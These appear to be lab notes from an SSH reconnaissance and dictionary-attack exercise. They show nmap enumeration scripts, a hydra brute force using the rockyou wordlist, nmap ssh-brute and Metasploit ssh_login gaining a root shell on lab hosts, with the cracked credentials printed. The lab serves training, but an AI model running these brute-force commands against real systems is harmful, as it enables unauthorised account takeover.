ssh-enum
sudo nmap -p22 -sV -sC -O <TARGET_IP>1
Lab 1
ip -br -c a
# output example:
# eth1@if130369 UP 192.8.3.2/24nmap -sV 192.8.3.322/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
MAC Address: 02:42:C0:08:03:03 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelnc 192.8.3.3 22SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.6ssh root@192.8.3.3 22nmap --script ssh2-enum-algos 192.8.3.3| ssh2-enum-algos:
| kex_algorithms: (6)
| curve25519-sha256@libssh.org
| ecdh-sha2-nistp256
| ecdh-sha2-nistp384
| ecdh-sha2-nistp521
| diffie-hellman-group-exchange-sha256
| diffie-hellman-group14-sha1
| server_host_key_algorithms: (5)
| ssh-rsa
| rsa-sha2-512
| rsa-sha2-256
| ecdsa-sha2-nistp256
| ssh-ed25519
| encryption_algorithms: (6)
| chacha20-poly1305@openssh.com
| aes128-ctr
| aes192-ctr
| aes256-ctr
| aes128-gcm@openssh.com
| aes256-gcm@openssh.com
| mac_algorithms: (10)
| umac-64-etm@openssh.com
| umac-128-etm@openssh.com
| hmac-sha2-256-etm@openssh.com
| hmac-sha2-512-etm@openssh.com
| hmac-sha1-etm@openssh.com
| umac-64@openssh.com
| umac-128@openssh.com
| hmac-sha2-256
| hmac-sha2-512
| hmac-sha1
| compression_algorithms: (2)
| none
|_ zlib@openssh.comnmap --script ssh-hostkey --script-args ssh_hostkey=full 192.8.3.3| ssh-hostkey:
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1fkJK7F8yxf3vewEcLYHljBnKTAiRqzFxkFo6lqyew73ATL2Abyh6at/oOmBSlPI90rtAMA6jQGJ+0HlHgf7mkjz5+CBo9j2VPu1bejYtcxpqpHcL5Bp12wgey1zup74fgd+yOzILjtgbnDOw1+HSkXqN79d+4BnK0QF6T9YnkHvBhZyjzIDmjonDy92yVBAIoB6Rdp0w7nzFz3aN9gzB5MW/nSmgc4qp7R6xtzGaqZKp1H3W3McZO3RELjGzvHOdRkAKL7n2kyVAraSUrR0Oo5m5e/sXrITYi9y0X6p2PTUfYiYvgkv/3xUF+5YDDA33AJvv8BblnRcRRZ74BxaD
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBB0cJ/kSOXBWVIBA2QH4UB6r7nFL5l7FwHubbSZ9dIs2JSmn/oIgvvQvxmI5YJxkdxRkQlF01KLDmVgESYXyDT4=
|_ ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKuZlCFfTgeaMC79zla20ZM2q64mjqWhKPw/2UzyQ2W/nmap -p22 --script ssh-auth-methods --script-args="ssh.user=student" 192.8.3.322/tcp open ssh
| ssh-auth-methods:
|_ Supported authentication methods: none_authnmap -p22 --script ssh-auth-methods --script-args="ssh.user=admin" 192.8.3.322/tcp open ssh
| ssh-auth-methods:
| Supported authentication methods:
| publickey
|_ passwordssh student@192.8.3.3
# once connected:
# ls
# FLAG
# cat FLAGnmap --script=ssh-run --script-args="ssh-run.cmd=cat /home/student/FLAG, ssh-run.username=student, ssh-run.password=" 192.8.3.3NSE: [ssh-run] Authenticated
NSE: [ssh-run] Running command: cat /home/student/FLAG
NSE: [ssh-run] Output of command: {FLAG_content}
Nmap scan report for target-1 (192.8.3.3)
Host is up (0.000011s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
22/tcp open ssh
| ssh-run:
| output:
|_ {FLAG_content}\x0D2
Lab 2
ip -br -c a
# output example:
# eth1@if130414 UP 192.230.83.2/24nmap -sV 192.230.83.322/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)gzip -d /usr/share/wordlists/rockyou.txt.gzhydra -l student -P /usr/share/wordlists/rockyou.txt 192.230.83.3 ssh[22][ssh] host: 192.230.83.3 login: student password: friend
1 of 1 target successfully completed, 1 valid password foundecho "administrator" > users
nmap -p22 --script=ssh-brute --script-args userdb=/root/users 192.230.83.3| ssh-brute:
| Accounts:
| administrator:sunshine - Valid credentials
|_ Statistics: Performed 27 guesses in 6 seconds, average tps: 4.5msfconsole
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.230.83.3
set USERPASS_FILE /usr/share/wordlists/metasploit/root_userpass.txt
set STOP_ON_SUCCESS true
set VERBOSE true
exploit[+] 192.230.83.3:22 - Success: 'root:attack' 'uid=0(root) gid=0(root) groups=0(root) Linux victim-1 ...'
[*] Command shell session 1 opened ...ssh root@192.230.83.3
# enter root password: attackWelcome to Ubuntu 16.04.5 LTS (GNU/Linux 5.4.0-125-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
SSH recon dictionary attack labLast updated